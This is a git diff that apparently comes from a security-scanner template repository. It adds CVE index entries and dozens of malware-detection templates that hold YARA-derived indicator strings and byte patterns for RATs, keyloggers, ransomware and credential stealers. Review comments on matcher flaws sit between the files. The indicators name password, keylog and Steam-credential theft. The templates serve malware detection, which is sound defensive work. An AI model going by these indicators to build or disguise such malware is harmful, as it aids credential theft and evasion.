The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"} +{"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"} {"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. 
An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} 
@@ -1962,3 +1970,5 @@ {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"high","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} +{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. 
Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"} +{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f35cde2940..6e8a608205 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b58b2350b7c7c0ab742dbd60851e3b31 +a11349fed98e93a8bbebdc46ec6718ae diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index 22148b690e..f11d6cf5a1 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -10,21 +10,17 @@ info: - https://www.theregister.com/2021/02/24/dns_cname_tracking/ - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ metadata: - max-request: 2 + max-request: 1 tags: dns,service dns: - name: "{{FQDN}}" type: CNAME - - name: "{{FQDN}}" - type: A - extractors: - - type: regex - group: 1 - regex: - - 'IN\t(?:A|CNAME)\t([A-Za-z0-9-_.]*([a-zA-Z]+[0-9]+|[0-9.]+[a-zA-Z]+))' + - type: dsl + dsl: + - cname matchers-condition: or matchers: @@ -389,6 +385,7 @@ dns: words: - hs.eloqua.com - - type: word - words: + - type: regex + regex: - "IN\tCNAME" + - "IN\\s*CNAME" diff --git a/file/malware/aar-malware.yaml b/file/malware/aar-malware.yaml new file mode 100644 index 0000000000..826b2d9e3c --- /dev/null +++ b/file/malware/aar-malware.yaml 
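Review bot: In the second hunk of dns/dns-saas-service-detection.yaml, the added `"IN\\s*CNAME"` pattern already covers the retained `"IN\tCNAME"` entry, since a tab is whitespace. `\s*` also accepts no whitespace at all between the class and the record type. A single entry, `- "IN\\s+CNAME"`, would express the same intent more tightly. The matcher list begins outside the hunk, so how this fallback combines with the earlier matchers cannot be confirmed from here.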
@@ -0,0 +1,25 @@ +id: aar-malware + +info: + name: AAR Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "Hashtable" + - "get_IsDisposed" + - "TripleDES" + - "testmemory.FRMMain.resources" + - "$this.Icon" + - "{11111-22222-20001-00001}" + - "@@@@@" + condition: and \ No newline at end of file diff --git a/file/malware/adzok-malware.yaml b/file/malware/adzok-malware.yaml new file mode 100644 index 0000000000..77504dd278 --- /dev/null +++ b/file/malware/adzok-malware.yaml 
@@ -0,0 +1,110 @@ +id: adzok-malware + +info: + name: Adzok Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Adzok.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "resources/icono.pngPK" + condition: and \ No newline at 
end of file diff --git a/file/malware/alfa-malware.yaml b/file/malware/alfa-malware.yaml new file mode 100644 index 0000000000..3f794408ea --- /dev/null +++ b/file/malware/alfa-malware.yaml @@ -0,0 +1,19 @@ +id: alfa-malware + +info: + name: Alfa Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "8B0C9781E1FFFF000081F919040000740F81F9" + - "220400007407423BD07CE2EB02" + condition: and diff --git a/file/malware/alienspy-malware.yaml b/file/malware/alienspy-malware.yaml new file mode 100644 index 0000000000..bd5ead14b3 --- /dev/null +++ b/file/malware/alienspy-malware.yaml @@ -0,0 +1,25 @@ +id: alienspy-malware + +info: + name: AlienSpy Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "META-INF/MANIFEST.MF" + - "ePK" + - "kPK" + - "config.ini" + - "password.ini" + - "stub/stub.dll" + - "c.dat" + condition: and \ No newline at end of file diff --git a/file/malware/alina-malware.yaml b/file/malware/alina-malware.yaml new file mode 100644 index 0000000000..9b4f6141e0 --- /dev/null +++ b/file/malware/alina-malware.yaml @@ -0,0 +1,21 @@ +id: alina-malware + +info: + name: Alina Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'Alina v1.0' + - 'POST' + - '1[0-2])[0-9]' + condition: and \ No newline at end of file diff --git a/file/malware/alpha-malware.yaml b/file/malware/alpha-malware.yaml new file mode 100644 index 0000000000..667414d798 --- /dev/null +++ b/file/malware/alpha-malware.yaml 
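Review bot: The eight `condition: and` blocks in adzok-malware.yaml are hard to audit as written. Each lists seven of the same eight archive-entry strings and leaves out a different one, so together they appear to encode "any seven of eight". A comment above `matchers-condition: or`, for example `# any 7 of the 8 strings below; each matcher omits exactly one`, would let a maintainer check the set against the referenced YARA rule without comparing the lists by hand.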
@@ -0,0 +1,17 @@
+id: alpha-malware
+
+info:
+ name: Alpha Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: binary
+ binary:
+ - "520065006100640020004D0065002000280048006F00770020004400650063"
diff --git a/file/malware/andromeda-malware.yaml b/file/malware/andromeda-malware.yaml
new file mode 100644
index 0000000000..64c7732254
--- /dev/null
+++ b/file/malware/andromeda-malware.yaml
@@ -0,0 +1,23 @@
+id: andromeda-malware
+
+info:
+ name: Andromeda Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst'
+
+ - type: binary
+ binary:
+ - "1C1C1D03494746"
\ No newline at end of file
diff --git a/file/malware/ap0calypse-malware.yaml b/file/malware/ap0calypse-malware.yaml
new file mode 100644
index 0000000000..55f1f59b8d
--- /dev/null
+++ b/file/malware/ap0calypse-malware.yaml
@@ -0,0 +1,24 @@
+id: ap0calypse-malware
+
+info:
+ name: Ap0calypse Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "Ap0calypse"
+ - "Sifre"
+ - "MsgGoster"
+ - "Baslik"
+ - "Dosyalars"
+ - "Injecsiyon"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/arcom-malware.yaml b/file/malware/arcom-malware.yaml
new file mode 100644
index 0000000000..a26bb3d29f
--- /dev/null
+++ b/file/malware/arcom-malware.yaml
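Review bot: The word in andromeda-malware.yaml, `'hsk\\ehs\\dihviceh…'`, is single-quoted, and YAML does not process backslash escapes in single-quoted scalars. The matcher therefore looks for two literal backslashes at each separator, and with `matchers-condition: and` the template cannot fire unless a sample really contains doubled backslashes. The same applies to `'\\files\\'` in arkei-malware.yaml, to `'%s\\%s\\%s.exe'` and `'\\Internet Explorer\\iexplore.exe'` in dexter-malware.yaml, and to the `'\x12F\x12F…'` words in ezcob-malware.yaml, where `\x12` stays four literal characters instead of one byte. bandook-malware.yaml and eicar-malware.yaml use double quotes for the same kind of string, which suggests single backslashes were intended. Switching these entries to double quotes, or to a `binary` matcher for the `\x12` sequences, would make them match that way.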
@@ -0,0 +1,28 @@ +id: arcom-malware + +info: + name: Arcom Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "CVu3388fnek3W(3ij3fkp0930di" + - "ZINGAWI2" + - "clWebLightGoldenrodYellow" + - "Ancestor for '%s' not found" + - "Control-C hit" + condition: and + + - type: binary + binary: + - "A3242521" \ No newline at end of file diff --git a/file/malware/arkei-malware.yaml b/file/malware/arkei-malware.yaml new file mode 100644 index 0000000000..aedc5ee182 --- /dev/null +++ b/file/malware/arkei-malware.yaml @@ -0,0 +1,23 @@ +id: arkei-malware + +info: + name: Arkei Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'Arkei' + - '/server/gate' + - '/server/grubConfig' + - '\\files\\' + - 'SQLite' + condition: and \ No newline at end of file diff --git a/file/malware/backoff-malware.yaml b/file/malware/backoff-malware.yaml new file mode 100644 index 0000000000..3219fcd564 --- /dev/null +++ b/file/malware/backoff-malware.yaml @@ -0,0 +1,21 @@ +id: backoff-malware + +info: + name: Backoff Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Backoff.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - '&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s' + - '%s @ %s' + - 'Upload KeyLogs' + condition: and \ No newline at end of file diff --git a/file/malware/bandook-malware.yaml b/file/malware/bandook-malware.yaml new file mode 100644 index 0000000000..a7ac27a5c3 --- /dev/null +++ b/file/malware/bandook-malware.yaml 
@@ -0,0 +1,28 @@ +id: bandook-malware + +info: + name: Bandook Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "aaaaaa1|" + - "aaaaaa2|" + - "aaaaaa3|" + - "aaaaaa4|" + - "aaaaaa5|" + - "%s%d.exe" + - "astalavista" + - "givemecache" + - "%s\\system32\\drivers\\blogs\\*" + - "bndk13me" + condition: and diff --git a/file/malware/blacknix-malware.yaml b/file/malware/blacknix-malware.yaml new file mode 100644 index 0000000000..9b76d44068 --- /dev/null +++ b/file/malware/blacknix-malware.yaml @@ -0,0 +1,23 @@ +id: blacknix-malware + +info: + name: BlackNix Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "SETTINGS" + - "Mark Adler" + - "Random-Number-Here" + - "RemoteShell" + - "SystemInfo" + condition: and diff --git a/file/malware/blackworm-malware.yaml b/file/malware/blackworm-malware.yaml new file mode 100644 index 0000000000..0e03c36477 --- /dev/null +++ b/file/malware/blackworm-malware.yaml @@ -0,0 +1,29 @@ +id: blackworm-malware + +info: + name: Blackworm Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'm_ComputerObjectProvider' + - 'MyWebServices' + - 'get_ExecutablePath' + - 'get_WebServices' + - 'My.WebServices' + - 'My.User' + - 'm_UserObjectProvider' + - 'DelegateCallback' + - 'TargetMethod' + - '000004b0' + - 'Microsoft Corporation' + condition: and \ No newline at end of file 
diff --git a/file/malware/bluebanana-malware.yaml b/file/malware/bluebanana-malware.yaml new file mode 100644 index 0000000000..450c03fec5 --- /dev/null +++ b/file/malware/bluebanana-malware.yaml @@ -0,0 +1,24 @@ +id: bluebanana-malware + +info: + name: BlueBanana Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "META-INF" + - "config.txt" + - "a/a/a/a/f.class" + - "a/a/a/a/l.class" + - "a/a/a/b/q.class" + - "a/a/a/b/v.class" + condition: and diff --git a/file/malware/bozok-malware.yaml b/file/malware/bozok-malware.yaml new file mode 100644 index 0000000000..1b4d7ec3fe --- /dev/null +++ b/file/malware/bozok-malware.yaml @@ -0,0 +1,24 @@ +id: bozok-malware + +info: + name: Bozok Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Bozok.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "getVer" + - "StartVNC" + - "SendCamList" + - "untPlugin" + - "gethostbyname" + condition: and + case-insensitive: true \ No newline at end of file diff --git a/file/malware/bublik-malware.yaml b/file/malware/bublik-malware.yaml new file mode 100644 index 0000000000..31fd9982b4 --- /dev/null +++ b/file/malware/bublik-malware.yaml @@ -0,0 +1,19 @@ +id: bublik-malware + +info: + name: Bublik Malware Detector + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Bublik.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - '636F6E736F6C6173' + - '636C556E00696E666F2E696E69' + condition: and \ No newline at end of file 
diff --git a/file/malware/cap-hookexkeylogger-malware.yaml b/file/malware/cap-hookexkeylogger-malware.yaml
new file mode 100644
index 0000000000..14535018bf
--- /dev/null
+++ b/file/malware/cap-hookexkeylogger-malware.yaml
@@ -0,0 +1,38 @@
+id: cap-hookexkeylogger-malware
+
+info:
+ name: CAP HookExKeylogger Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_CAP_HookExKeylogger.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "SetWindowsHookEx"
+ - "WH_KEYBOARD_LL"
+ condition: and
+ case-insensitive: true
+
+ - type: word
+ part: raw
+ words:
+ - "SetWindowsHookEx"
+ - "WH_KEYBOARD"
+ condition: and
+ case-insensitive: true
+
+ - type: word
+ part: raw
+ words:
+ - "WH_KEYBOARD"
+ - "WH_KEYBOARD_LL"
+ condition: and
+ case-insensitive: true
\ No newline at end of file
diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml
new file mode 100644
index 0000000000..259ad785fa
--- /dev/null
+++ b/file/malware/cerberus-malware.yaml
@@ -0,0 +1,28 @@
+id: cerberus-malware
+
+info:
+ name: Cerberus Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - "Ypmw1Syv023QZD"
+ - "wZ2pla"
+ - "wBmpf3Pb7RJe"
+ condition: or
+
+ - type: word
+ part: raw
+ words:
+ - "cerberus"
+ case-insensitive: true
diff --git a/file/malware/clientmesh-malware.yaml b/file/malware/clientmesh-malware.yaml
new file mode 100644
index 0000000000..3a8713d7be
--- /dev/null
+++ b/file/malware/clientmesh-malware.yaml
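Review bot: In cap-hookexkeylogger-malware.yaml the third matcher is satisfied by `WH_KEYBOARD_LL` alone, because `WH_KEYBOARD` is a substring of it and word matchers compare by substring (assuming the usual nuclei behaviour). Any file that mentions the low-level keyboard hook constant, such as SDK headers, documentation or legitimate input software, is then reported under a name ending in "Malware". If two distinct indicators are intended, drop the third matcher and keep the two that require `SetWindowsHookEx`. Otherwise the `name` should say that it flags keyboard-hook API usage rather than a malware family.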
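Review bot: The second matcher in cerberus-malware.yaml fires on the bare word `cerberus` in any letter case, and with `matchers-condition: or` and `extensions: all` that alone is a hit, so unrelated files that merely contain the name will be reported. The first matcher has the same weakness on a smaller scale, since its `condition: or` lets the six-character `wZ2pla` match by itself. Changing the top-level line to `matchers-condition: and` would require the generic word together with at least one of the three protocol strings.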
@@ -0,0 +1,29 @@ +id: clientmesh-malware + +info: + name: ClientMesh Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "machinedetails" + - "MySettings" + - "sendftppasswords" + - "sendbrowserpasswords" + - "arma2keyMass" + - "keylogger" + condition: and + + - type: binary + binary: + - "0000000000000000007E" \ No newline at end of file diff --git a/file/malware/crimson-malware.yaml b/file/malware/crimson-malware.yaml new file mode 100644 index 0000000000..8d79c7a766 --- /dev/null +++ b/file/malware/crimson-malware.yaml @@ -0,0 +1,23 @@ +id: crimson-malware + +info: + name: Crimson Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Crimson.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "com/crimson/PK" + - "com/crimson/bootstrapJar/PK" + - "com/crimson/permaJarMulti/PermaJarReporter$1.classPK" + - "com/crimson/universal/containers/KeyloggerLog.classPK" + - "com/crimson/universal/UploadTransfer.classPK" + condition: and diff --git a/file/malware/cryptxxx-dropper-malware.yaml b/file/malware/cryptxxx-dropper-malware.yaml new file mode 100644 index 0000000000..df19738c6c --- /dev/null +++ b/file/malware/cryptxxx-dropper-malware.yaml @@ -0,0 +1,19 @@ +id: cryptxxx-dropper-malware + +info: + name: CryptXXX Dropper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: binary + binary: + - "50653157584346765962486F35" + - "43003A005C0042004900450052005C0051006D006B004E0052004C00460000" + condition: and \ No newline at end of file 
diff --git a/file/malware/cryptxxx-malware.yaml b/file/malware/cryptxxx-malware.yaml
new file mode 100644
index 0000000000..07866a3b0b
--- /dev/null
+++ b/file/malware/cryptxxx-malware.yaml
@@ -0,0 +1,42 @@
+id: cryptxxx-malware
+
+info:
+ name: CryptXXX Malware - Detect
+ author: daffainfo
+ severity: info
+ reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: binary
+ binary:
+ - "525947404A41595D52000000FFFFFFFF"
+ - "0600000052594740405A0000FFFFFFFF"
+ - "0A000000525C4B4D574D424B5C520000"
+ - "FFFFFFFF0A000000525D575D5A4B4370"
+ - "3F520000FFFFFFFF06000000524C4141"
+ - "5A520000FFFFFFFF0A000000525C4B4D"
+ - "41584B5C57520000FFFFFFFF0E000000"
+ - "522A5C4B4D574D424B204C4740520000"
+ - "FFFFFFFF0A000000525E4B5C48424149"
+ - "5D520000FFFFFFFF05000000524B4847"
+ - "52000000FFFFFFFF0C000000524D4140"
+ - "48474920435D475200000000FFFFFFFF"
+ - "0A000000525E5C41495C4F703F520000"
+ - "FFFFFFFF0A000000525E5C41495C4F70"
+ - "3C520000FFFFFFFF0800000052494141"
+ - "49424B5200000000FFFFFFFF06000000"
+ - "525A4B435E520000FFFFFFFF08000000"
+ - "52483A4C4D703F5200000000FFFFFFFF"
+ - "0A000000524F42425B5D4B703F520000"
+ - "FFFFFFFF0A000000525E5C41495C4F70"
+ - "3F520000FFFFFFFF0A000000525E5C41"
+ - "495C4F703C520000FFFFFFFF09000000"
+ - "524F5E5E4A4F5A4F52000000FFFFFFFF"
+ - "0A000000525E5C41495C4F703D520000"
+ - "FFFFFFFF08000000525E5B4C42474D52"
+ condition: and
\ No newline at end of file
diff --git a/file/malware/cxpid-malware.yaml b/file/malware/cxpid-malware.yaml
new file mode 100644
index 0000000000..6019bd1e37
--- /dev/null
+++ b/file/malware/cxpid-malware.yaml
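Review bot: The 25 `binary` entries in cryptxxx-malware.yaml look like consecutive 16-byte slices of one longer byte sequence, but as separate entries under `condition: and` they are matched independently, so neither their order nor their adjacency is checked. One slice, `FFFFFFFF0A000000525E5C41495C4F70`, is listed twice, which adds nothing to the condition. If the referenced YARA rule defines one contiguous pattern, a single hex string carrying the whole sequence would preserve it. At minimum a comment such as `# 16-byte slices of one sequence from the YARA rule; order is not enforced` should say what the list is.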
@@ -0,0 +1,27 @@ +id: cxpid-malware + +info: + name: Cxpid Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cxpid.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - '/cxpid/submit.php?SessionID=' + - '/cxgid/' + - 'E21BC52BEA2FEF26D005CF' + - 'E21BC52BEA39E435C40CD8' + - ' -,L-,O+,Q-,R-,Y-,S-' + + - type: binary + binary: + - "558BECB9380400006A006A004975F9" \ No newline at end of file diff --git a/file/malware/cythosia-malware.yaml b/file/malware/cythosia-malware.yaml new file mode 100644 index 0000000000..081a55ed58 --- /dev/null +++ b/file/malware/cythosia-malware.yaml @@ -0,0 +1,18 @@ +id: cythosia-malware + +info: + name: Cythosia Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cythosia.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - 'HarvesterSocksBot.Properties.Resources' \ No newline at end of file diff --git a/file/malware/darkrat-malware.yaml b/file/malware/darkrat-malware.yaml new file mode 100644 index 0000000000..69503ad5c0 --- /dev/null +++ b/file/malware/darkrat-malware.yaml @@ -0,0 +1,25 @@ +id: darkrat-malware + +info: + name: DarkRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - "@1906dark1996coder@" + - "SHEmptyRecycleBinA" + - "mciSendStringA" + - "add_Shutdown" + - "get_SaveMySettingsOnExit" + - "get_SpecialDirectories" + - "Client.My" + condition: and diff --git a/file/malware/ddostf-malware.yaml b/file/malware/ddostf-malware.yaml new file mode 100644 index 0000000000..90db92b876 --- /dev/null +++ b/file/malware/ddostf-malware.yaml 
@@ -0,0 +1,30 @@ +id: ddostf-malware + +info: + name: DDoSTf Malware - Detect + author: daffainfo + severity: info + reference: + - http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DDoSTf.yar + tags: malware,file + +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'ddos.tf' + - 'Accept-Language: zh' + - '%d Kb/bps|%d%%' + condition: and + + - type: binary + binary: + - 'E8AEBEE7BDAE5443505F4B454550494E54564CE99499E8AFAFEFBC9A00' + - 'E8AEBEE7BDAE5443505F4B454550434E54E99499E8AFAFEFBC9A00' + condition: and \ No newline at end of file diff --git a/file/malware/derkziel-malware.yaml b/file/malware/derkziel-malware.yaml new file mode 100644 index 0000000000..7c2aa65ec2 --- /dev/null +++ b/file/malware/derkziel-malware.yaml @@ -0,0 +1,25 @@ +id: derkziel-malware + +info: + name: Derkziel Malware - Detect + author: daffainfo + severity: info + reference: + - https://bhf.su/threads/137898/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Derkziel.yar + tags: malware,file + +file: + - extensions: + - all + + matchers: + - type: word + part: raw + words: + - '{!}DRZ{!}' + - 'User-Agent: Uploador' + - 'SteamAppData.vdf' + - 'loginusers.vdf' + - 'config.vdf' + condition: and \ No newline at end of file diff --git a/file/malware/dexter-malware.yaml b/file/malware/dexter-malware.yaml new file mode 100644 index 0000000000..a0a340ab11 --- /dev/null +++ b/file/malware/dexter-malware.yaml 
@@ -0,0 +1,24 @@
+id: dexter-malware
+
+info:
+ name: Dexter Malware - Detect
+ author: daffainfo
+ severity: info
+ reference:
+ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Dexter.yar
+ - http://goo.gl/oBvy8b
+ tags: malware,file
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ part: raw
+ words:
+ - 'Java Security Plugin'
+ - '%s\\%s\\%s.exe'
+ - 'Sun Java Security Plugin'
+ - '\\Internet Explorer\\iexplore.exe'
+ condition: and
\ No newline at end of file
diff --git a/file/malware/diamondfox-malware.yaml b/file/malware/diamondfox-malware.yaml
new file mode 100644
index 0000000000..da9087a090
--- /dev/null
+++ b/file/malware/diamondfox-malware.yaml
@@ -0,0 +1,24 @@
+id: diamondfox-malware
+
+info:
+ name: DiamondFox Malware - Detect
+ author: daffainfo
+ severity: info
